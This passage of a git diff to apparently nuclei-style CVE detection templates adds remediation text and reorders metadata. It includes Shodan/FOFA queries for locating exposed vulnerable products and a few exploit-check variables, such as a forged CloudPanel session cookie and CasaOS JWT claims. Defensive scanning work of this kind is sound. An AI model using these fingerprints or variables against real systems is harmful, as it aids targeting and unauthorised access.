/jeecg-boot/jmreport/show interface. + remediation: | + Upgrade JeecgBoot to a patched version or apply the necessary security patches provided by the vendor. reference: - https://github.com/jeecgboot/jeecg-boot/issues/4976 - https://nvd.nist.gov/vuln/detail/CVE-2023-34659 @@ -15,13 +17,13 @@ info: cve-id: CVE-2023-34659 cwe-id: CWE-89 epss-score: 0.04804 - cpe: cpe:2.3:a:jeecg:jeecg_boot:3.5.0:*:*:*:*:*:*:* epss-percentile: 0.91686 + cpe: cpe:2.3:a:jeecg:jeecg_boot:3.5.0:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.favicon.hash:1380908726 vendor: jeecg product: jeecg_boot + shodan-query: http.favicon.hash:1380908726 tags: cve,cve2023,jeecg,sqli http: diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index 1f2dd55aea..964713c327 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8. + remediation: | + Upgrade to the latest version of Hestiacp (1.7.9 or higher) to mitigate this vulnerability. reference: - https://huntr.dev/bounties/6ac5cf87-6350-4645-8930-8f2876427723/ - https://nvd.nist.gov/vuln/detail/CVE-2023-3479 @@ -16,14 +18,14 @@ info: cve-id: CVE-2023-3479 cwe-id: CWE-79 epss-score: 0.00077 - cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:* epss-percentile: 0.3156 + cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: http.favicon.hash:-476299640 + max-request: 1 vendor: hestiacp product: control_panel + shodan-query: http.favicon.hash:-476299640 tags: huntr,cve,cve2023,hestiacp,xss,intrusive http: diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index 74163e0926..8564178b1b 100644 --- a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -6,6 +6,8 @@ info: severity: high description: | traggo/server version 0.3.0 is vulnerable to directory traversal. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/rootd4ddy/CVE-2023-34843 classification: @@ -14,14 +16,14 @@ info: cve-id: CVE-2023-34843 cwe-id: CWE-22 epss-score: 0.00297 - cpe: cpe:2.3:a:traggo:traggo:0.3.0:*:*:*:*:*:*:* epss-percentile: 0.65501 + cpe: cpe:2.3:a:traggo:traggo:0.3.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: html:"traggo" + max-request: 1 vendor: traggo product: traggo + shodan-query: html:"traggo" tags: cve,cve2023,traggo,lfi,server http: diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index ee50c95d61..95c7985429 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the command injection vulnerability in Chamilo LMS. reference: - https://sploitus.com/exploit?id=FD666992-20E1-5D83-BA13-67ED38E1B83D - https://github.com/Aituglo/CVE-2023-34960/blob/master/poc.py @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-34960 cwe-id: CWE-77 epss-score: 0.81793 - cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* epss-percentile: 0.97936 + cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" - shodan-query: http.component:"Chamilo" + max-request: 1 vendor: chamilo product: chamilo + shodan-query: http.component:"Chamilo" tags: cve,cve2023,chamilo http: diff --git a/http/cves/2023/CVE-2023-35078.yaml b/http/cves/2023/CVE-2023-35078.yaml index a4c5834596..692c37e8b1 100644 --- a/http/cves/2023/CVE-2023-35078.yaml +++ b/http/cves/2023/CVE-2023-35078.yaml @@ -5,6 +5,8 @@ info: author: parth,pdresearch severity: critical description: Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available. + remediation: | + Apply the latest security patches or updates provided by Ivanti to fix the authentication bypass vulnerability in Endpoint Manager Mobile (EPMM). reference: - https://forums.ivanti.com/s/article/CVE-2023-35078-Remote-unauthenticated-API-access-vulnerability - https://forums.ivanti.com/s/article/KB-Remote-unauthenticated-API-access-vulnerability-CVE-2023-35078 @@ -17,15 +19,15 @@ info: cve-id: CVE-2023-35078 cwe-id: CWE-287 epss-score: 0.96524 - cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* epss-percentile: 0.99414 + cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - fofa-query: icon_hash="362091310" - shodan-query: http.favicon.hash:362091310 + max-request: 1 vendor: ivanti product: endpoint_manager_mobile + shodan-query: http.favicon.hash:362091310 + fofa-query: icon_hash="362091310" tags: cve,cve2023,kev,ivanti,mobileiron,epmm http: diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index 7c98abdb46..63c61a2709 100644 --- a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml @@ -6,26 +6,26 @@ info: severity: critical description: | Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain. + remediation: Upgrading to the latest version of Ivanti Endpoint Manager Mobile (EPMM) reference: - https://www.rapid7.com/blog/post/2023/08/02/cve-2023-35082-mobileiron-core-unauthenticated-api-access-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2023-35082 - https://forums.ivanti.com/s/article/CVE-2023-35082-Remote-Unauthenticated-API-Access-Vulnerability-in-MobileIron-Core-11-2-and-older?language=en_US - remediation: Upgrading to the latest version of Ivanti Endpoint Manager Mobile (EPMM) classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-35082 cwe-id: CWE-287 epss-score: 0.52767 - cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* epss-percentile: 0.97143 + cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - fofa-query: icon_hash="362091310" - shodan-query: http.favicon.hash:362091310 + max-request: 1 vendor: ivanti product: endpoint_manager_mobile + shodan-query: http.favicon.hash:362091310 + fofa-query: icon_hash="362091310" tags: cve,cve2023,ivanti,mobileiron,epmm http: diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index d01b56dfed..94e5fb7d71 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -6,6 +6,8 @@ info: severity: high description: | NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information. + remediation: | + Upgrade NocoDB to a version higher than 0.106.1 to mitigate the vulnerability. reference: - https://advisory.dw1.io/60 - https://nvd.nist.gov/vuln/detail/CVE-2023-35843 @@ -17,14 +19,14 @@ info: cve-id: CVE-2023-35843 cwe-id: CWE-22 epss-score: 0.01632 - cpe: cpe:2.3:a:nocodb:nocodb:*:*:*:*:*:*:*:* epss-percentile: 0.85943 + cpe: cpe:2.3:a:nocodb:nocodb:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: http.favicon.hash:-2017596142 + max-request: 1 vendor: nocodb product: nocodb + shodan-query: http.favicon.hash:-2017596142 tags: cve,cve2023,nocodb,lfi http: diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index e9b4132ddf..bdcdb2df02 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -9,6 +9,8 @@ info: has insecure file endpoints, e.g., they allow .. directory traversal and do not ensure that an intended file extension (.csv or .png) is used. + remediation: | + Upgrade Lightdash to a version higher than 0.510.3 to mitigate the vulnerability. reference: - https://advisory.dw1.io/59 - https://nvd.nist.gov/vuln/detail/CVE-2023-35844 @@ -21,14 +23,14 @@ info: cve-id: CVE-2023-35844 cwe-id: CWE-22 epss-score: 0.00499 - cpe: cpe:2.3:a:lightdash:lightdash:*:*:*:*:*:*:*:* epss-percentile: 0.73306 + cpe: cpe:2.3:a:lightdash:lightdash:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: title:"Lightdash" verified: true + max-request: 1 vendor: lightdash product: lightdash + shodan-query: title:"Lightdash" tags: cve,cve2023,lightdash,lfi http: diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml index 5784323065..e7072f1c3d 100644 --- a/http/cves/2023/CVE-2023-35885.yaml +++ b/http/cves/2023/CVE-2023-35885.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication. + remediation: | + Upgrade Cloudpanel to version 2.3.1 or later to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-35885 - https://www.datack.my/fallingskies-cloudpanel-0-day/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2023-35885 cwe-id: CWE-565 epss-score: 0.01968 - cpe: cpe:2.3:a:mgt-commerce:cloudpanel:*:*:*:*:*:*:*:* epss-percentile: 0.87262 + cpe: cpe:2.3:a:mgt-commerce:cloudpanel:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 5 + vendor: mgt-commerce product: cloudpanel shodan-query: title:"Cloudpanel" - vendor: mgt-commerce - verified: true tags: cve,cve2023,cloudpanel,rce,instrusive variables: session: "ZGVmNTAyMDA3ZDI0OGNjZmU0NTVkMGQ2NmJhMjUxYjdhYzg0NzcyYzBmNjM0ODg0ODY0OWYyZTQ0MjgwZDVjZDBjNmY3MWJiZWU4ZTM4OTU4ZmE4YjViNjE4MGJiZjQ4NzA3MzcwNTJiNzFhM2JjYTBmNTdiODQ4ZDZjYjhiNmY1N2U3YTM1YWY3YjA3MTM1ZTlkYjViMjY5OTkzM2Q3NTAyOWI0ZGQ5ZDZmOTFhYTVlZTRhZjg0ZTBmZTU5NjY4NGI4OGU0NjVkNDU4MWYxOTc2MGNiMGI0ZGY2MmZjM2RkMmI4N2RhMzJkYTU4NjNjMWFmMGZlOWIwZjcyZGRkNmFhYzk3ZGVlZmY=" diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml index ddd254e673..2c8b4321c2 100644 --- a/http/cves/2023/CVE-2023-36287.yaml +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter. + remediation: | + To remediate this issue, it is recommended to apply the latest security patches or updates provided by the vendor. reference: - https://github.com/webkul/hotelcommerce - https://flashy-lemonade-192.notion.site/Cross-site-scripting-via-controller-parameter-in-QloApps-1-6-0-97e409ce164f40d195b625b9bf719900 @@ -16,11 +18,11 @@ info: cve-id: CVE-2023-36287 cwe-id: CWE-79 epss-score: 0.00077 - cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* epss-percentile: 0.31522 + cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: webkul product: qloapps tags: cve,cve2023,xss,webkul-qloapps,unauth diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml index af231498d5..34f72b85e7 100644 --- a/http/cves/2023/CVE-2023-36289.yaml +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter. + remediation: | + To remediate this issue, it is recommended to apply the latest security patches or updates provided by the vendor. reference: - https://github.com/webkul/hotelcommerce - https://flashy-lemonade-192.notion.site/Cross-site-scripting-in-POST-Request-via-email_create-and-back-parameter-in-QloApps-1-6-0-e05548203d744daf9047d82fc94b19b7 @@ -16,11 +18,11 @@ info: cve-id: CVE-2023-36289 cwe-id: CWE-79 epss-score: 0.00077 - cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* epss-percentile: 0.31522 + cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: webkul product: qloapps tags: cve,cve2023,xss,webkul-qloapps,unauth diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index ad1b8710de..af4315fe56 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -1,11 +1,13 @@ id: CVE-2023-36346 info: - name: POS Codekop v2.0 - Cross-site Scripting + name: POS Codekop v2.0 - Cross Site Scripting author: r3Y3r53 severity: medium description: | POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://yuyudhn.github.io/pos-codekop-vulnerability/ - https://www.youtube.com/watch?v=bbbA-q1syrA @@ -18,7 +20,6 @@ info: cwe-id: CWE-79 epss-score: 0.00075 cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:* - epss-percentile: 0.30622 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml index fe19e6052a..8ed170acac 100644 --- a/http/cves/2023/CVE-2023-36844.yaml +++ b/http/cves/2023/CVE-2023-36844.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities. + remediation: | + Apply the latest security patches and firmware updates provided by Juniper Networks to mitigate this vulnerability. reference: - https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/ - https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844 @@ -17,14 +19,14 @@ info: cve-id: CVE-2023-36844 cwe-id: CWE-473 epss-score: 0.02371 - cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* epss-percentile: 0.88443 + cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true - shodan-query: title:"Juniper Web Device Manager" + max-request: 3 vendor: juniper product: junos + shodan-query: title:"Juniper Web Device Manager" tags: cve,cve2023,juniper,php,rce,intrusive,fileupload variables: value: "CVE-2023-36844" diff --git a/http/cves/2023/CVE-2023-36934.yaml b/http/cves/2023/CVE-2023-36934.yaml index c4847536d0..118cb4b175 100644 --- a/http/cves/2023/CVE-2023-36934.yaml +++ b/http/cves/2023/CVE-2023-36934.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in the MOVEit Transfer application. reference: - https://community.progress.com/s/article/MOVEit-Transfer-2020-1-Service-Pack-July-2023 - https://blog.projectdiscovery.io/moveit-transfer-sql-injection/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2023-36934 cwe-id: CWE-89 epss-score: 0.15657 - cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* epss-percentile: 0.95206 + cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 4 + vendor: progress product: moveit_transfer shodan-query: http.favicon.hash:989289239 - vendor: progress - verified: true tags: cve,cve2023,moveit,rce,sqli,intrusive variables: session_cookie: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml index d4cc0dc545..f337c7cc4c 100644 --- a/http/cves/2023/CVE-2023-37265.yaml +++ b/http/cves/2023/CVE-2023-37265.yaml @@ -6,27 +6,27 @@ info: severity: critical description: | CasaOS is an open-source Personal Cloud system. Due to a lack of IP address verification an unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances. The problem was addressed by improving the detection of client IP addresses in `391dd7f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly. + remediation: The problem was addressed by improving the detection of client IP addresses in 391dd7f. This patch is part of CasaOS 0.4.4. reference: - https://github.com/IceWhaleTech/CasaOS/commit/705bf1facbffd2ca40b159b0303132b6fdf657ad - https://github.com/IceWhaleTech/CasaOS/security/advisories/GHSA-m5q5-8mfw-p2hr - https://github.com/IceWhaleTech/CasaOS-Gateway/commit/391dd7f0f239020c46bf057cfa25f82031fc15f7 - https://github.com/IceWhaleTech/CasaOS-Gateway/security/advisories/GHSA-vjh7-5r6x-xh6g - remediation: The problem was addressed by improving the detection of client IP addresses in 391dd7f. This patch is part of CasaOS 0.4.4. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-37265 cwe-id: CWE-306 epss-score: 0.1326 - cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* epss-percentile: 0.94837 + cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: body="/CasaOS-UI/public/index.html" - shodan-query: http.html:"/CasaOS-UI/public/index.html" vendor: icewhale product: casaos + shodan-query: http.html:"/CasaOS-UI/public/index.html" + fofa-query: body="/CasaOS-UI/public/index.html" tags: cve,cve2023,oss,casaos,jwt http: diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml index 91b14cf0aa..3ac1552273 100644 --- a/http/cves/2023/CVE-2023-37266.yaml +++ b/http/cves/2023/CVE-2023-37266.yaml @@ -6,25 +6,25 @@ info: severity: critical description: | CasaOS is an open-source Personal Cloud system. Unauthenticated attackers can craft arbitrary JWTs and access features that usually require authentication and execute arbitrary commands as `root` on CasaOS instances. This problem was addressed by improving the validation of JWTs in commit `705bf1f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly. + remediation: The problem was addressed by improving the validation of JWTs in 705bf1f. This patch is part of CasaOS 0.4.4. reference: - https://github.com/IceWhaleTech/CasaOS/commit/705bf1facbffd2ca40b159b0303132b6fdf657ad - https://github.com/IceWhaleTech/CasaOS/security/advisories/GHSA-m5q5-8mfw-p2hr - remediation: The problem was addressed by improving the validation of JWTs in 705bf1f. This patch is part of CasaOS 0.4.4. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-37266 cwe-id: CWE-287 epss-score: 0.06744 - cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* epss-percentile: 0.92955 + cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: body="/CasaOS-UI/public/index.html" - shodan-query: http.html:"/CasaOS-UI/public/index.html" vendor: icewhale product: casaos + shodan-query: http.html:"/CasaOS-UI/public/index.html" + fofa-query: body="/CasaOS-UI/public/index.html" tags: cve,cve2023,oss,casaos,jwt variables: jwt_data: '{"iss":"casaos","exp":1790210322,"nbf":1790199522,"iat":1790199522}' diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml index ddbc19368e..9b750d38a1 100644 --- a/http/cves/2023/CVE-2023-37270.yaml +++ b/http/cves/2023/CVE-2023-37270.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Piwigo is open source photo gallery software. Prior to version 13.8.0, there is a SQL Injection vulnerability in the login of the administrator screen. The SQL statement that acquires the HTTP Header `User-Agent` is vulnerable at the endpoint that records user information when logging in to the administrator screen. It is possible to execute arbitrary SQL statements. Someone who wants to exploit the vulnerability must be log in to the administrator screen, even with low privileges. Any SQL statement can be executed. Doing so may leak information from the database. Version 13.8.0 contains a fix for this issue. As another mitigation, those who want to execute a SQL statement verbatim with user-enterable parameters should be sure to escape the parameter contents appropriately. + remediation: | + Upgrade to a patched version of Piwigo or apply the necessary security patches provided by the vendor. reference: - https://github.com/Piwigo/Piwigo/security/advisories/GHSA-934w-qj9p-3qcx - https://nvd.nist.gov/vuln/detail/CVE-2023-27524 @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-37270 cwe-id: CWE-89 epss-score: 0.01274 - cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* epss-percentile: 0.83984 + cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true - shodan-query: http.favicon.hash:540706145 + max-request: 2 vendor: piwigo product: piwigo + shodan-query: http.favicon.hash:540706145 tags: cve,cve2023,piwigo,sqli,authenticated http: diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml index 4382350d69..95a26e8c2c 100644 --- a/http/cves/2023/CVE-2023-37462.yaml +++ b/http/cves/2023/CVE-2023-37462.yaml @@ -6,26 +6,26 @@ info: severity: high description: | XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Improper escaping in the document `SkinsCode.XWikiSkinsSheet` leads to an injection vector from view right on that document to programming rights, or in other words, it is possible to execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload. It is possible to check if an existing installation is vulnerable + remediation: This issue has been patched in XWiki 14.4.8, 14.10.4 and 15.0-rc-1. Users are advised to upgrade. reference: - https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29 - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h4vp-69r8-gvjg - https://jira.xwiki.org/browse/XWIKI-20457 - remediation: This issue has been patched in XWiki 14.4.8, 14.10.4 and 15.0-rc-1. Users are advised to upgrade. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-37462 cwe-id: CWE-74 epss-score: 0.36071 - cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* epss-percentile: 0.96614 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true - shodan-query: html:"data-xwiki-reference" - fofa-query: body="data-xwiki-reference" + max-request: 2 vendor: xwiki product: xwiki + shodan-query: html:"data-xwiki-reference" + fofa-query: body="data-xwiki-reference" tags: cve,cve2023,xwiki,rce http: diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml index 4d491323ab..d6b8d91168 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS). Additionally, implement input validation and output encoding to mitigate the risk of XSS attacks. reference: - https://github.com/Zimbra/zm-web-client/pull/827 - https://blog.zimbra.com/2023/07/security-update-for-zimbra-collaboration-suite-version-8-8-15/ @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-37580 cwe-id: CWE-79 epss-score: 0.20311 - cpe: cpe:2.3:a:zimbra:zimbra:*:*:*:*:*:*:*:* epss-percentile: 0.95707 + cpe: cpe:2.3:a:zimbra:zimbra:*:*:*:*:*:*:*:* metadata: - fofa-query: icon_hash="475145467" max-request: 2 - shodan-query: http.favicon.hash:475145467 vendor: zimbra product: zimbra + shodan-query: http.favicon.hash:475145467 + fofa-query: icon_hash="475145467" tags: cve,cve2023,zimbra,xss,authenticated,kev http: diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml index b2ac5fb05a..862b78fda7 100644 --- a/http/cves/2023/CVE-2023-3765.yaml +++ b/http/cves/2023/CVE-2023-3765.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0. + remediation: | + Upgrade to a patched version of MLflow to mitigate the Absolute Path Traversal vulnerability. reference: - https://www.tenable.com/cve/CVE-2023-3765 - https://huntr.dev/bounties/4be5fd63-8a0a-490d-9ee1-f33dc768ed76 @@ -17,14 +19,14 @@ info: cve-id: CVE-2023-3765 cwe-id: CWE-36 epss-score: 0.00713 - cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* epss-percentile: 0.78017 + cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: http.title:"mlflow" + max-request: 1 vendor: lfprojects product: mlflow + shodan-query: http.title:"mlflow" tags: cve,cve2023,mflow,lfi,huntr http: diff --git a/http/cves/2023/CVE-2023-38035.yaml b/http/cves/2023/CVE-2023-38035.yaml index 795bae7592..9bdd851be7 100644 --- a/http/cves/2023/CVE-2023-38035.yaml +++ b/http/cves/2023/CVE-2023-38035.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration. + remediation: | + Apply the latest security patches or updates provided by Ivanti to fix the authentication bypass vulnerability. reference: - https://forums.ivanti.com/s/article/CVE-2023-38035-API-Authentication-Bypass-on-Sentry-Administrator-Interface - https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2023-38035 cwe-id: CWE-863 epss-score: 0.91817 - cpe: cpe:2.3:a:ivanti:mobileiron_sentry:*:*:*:*:*:*:*:* epss-percentile: 0.98531 + cpe: cpe:2.3:a:ivanti:mobileiron_sentry:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: 'html:"Note: Requires a local Sentry administrative user"' verified: true + max-request: 1 vendor: ivanti product: mobileiron_sentry + shodan-query: 'html:"Note: Requires a local Sentry administrative user"' tags: cve,cve2023,ivanti,mobileiron,sentry,kev,rce,auth-bypass,oast variables: oast: "{{interactsh-url}}/?" diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml index 8290b63cf4..d07e06ee53 100644 --- a/http/cves/2023/CVE-2023-38205.yaml +++ b/http/cves/2023/CVE-2023-38205.yaml @@ -6,6 +6,8 @@ info: severity: high description: | There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator. + remediation: | + Apply the necessary security patches or updates provided by Adobe to mitigate this vulnerability. reference: - https://www.rapid7.com/blog/post/2023/07/19/cve-2023-38205-adobe-coldfusion-access-control-bypass-fixed/ - https://helpx.adobe.com/security/products/coldfusion/apsb23-47.html @@ -15,12 +17,12 @@ info: cve-id: CVE-2023-38205 cwe-id: CWE-284 metadata: - max-request: 1 verified: true - fofa-query: app="Adobe-ColdFusion" - shodan-query: http.component:"Adobe ColdFusion" - product: coldfusion + max-request: 1 vendor: adobe + product: coldfusion + shodan-query: http.component:"Adobe ColdFusion" + fofa-query: app="Adobe-ColdFusion" tags: cve,cve2023,adobe,auth-bypass,coldfusion,kev http: diff --git a/http/cves/2023/CVE-2023-3836.yaml b/http/cves/2023/CVE-2023-3836.yaml index 79f5c62cc5..818729513a 100644 --- a/http/cves/2023/CVE-2023-3836.yaml +++ b/http/cves/2023/CVE-2023-3836.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the arbitrary file 